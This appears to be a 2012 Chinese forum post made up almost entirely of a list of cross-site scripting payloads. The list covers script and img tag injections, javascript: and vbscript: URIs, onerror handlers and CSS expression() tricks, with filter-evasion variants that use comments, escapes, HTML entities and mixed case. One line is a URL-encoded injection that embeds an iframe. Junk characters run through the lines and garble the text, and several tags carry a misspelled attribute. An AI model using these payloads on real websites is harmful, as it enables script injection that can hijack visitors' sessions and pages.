<script>alert("跨站")</script> (最常用)0 X/ K' b" r- [3 A$ \
<img scr=javascript:alert("跨站")></img>
$ n/ ?7 I( @* o5 D. L<img scr="javascript: alert(/跨站/)></img>
: l% T: I; G6 ^! c5 r<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
; j/ q9 b- |5 l3 U* j& J<img scr="#" onerror=alert(/跨站/)></img> `4 i9 J5 U7 I: H
<img scr="#" style="xss:expression(alert(/xss/));"></img>1 j/ G6 ^5 b M( W9 T0 w- U& K
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
0 B7 R r& q6 A" B<img src=vbscript:msgbox ("xss")></img>% ?" _2 `) g% t E$ Y5 R# h; T7 o! @
<style> input {left:expression (alert('xss'))}</style>
8 T/ f% R5 p1 V6 Y f* N<div style={left:expression (alert('xss'))}></div>2 j* H) m) d+ I8 Y8 H; A0 x
<div style={left:exp/* */ression (alert('xss'))}></div>% v7 \7 ]( M b* f6 l5 I+ I V
<div style={left:\0065\0078ression (alert('xss'))}></div>
1 H. c6 |# W) }- thtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>& \, F* `7 S) V) B" V. _
unicode <div style="{left:expRessioN (alert('xss'))}">
5 u! u; i7 a# U! w* U( u$ e* D) u; c0 z# A0 }4 t
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["" {7 ]7 s: D( b" [
|
发表于 2012-9-13 17:15:04
收藏
分享
支持
反对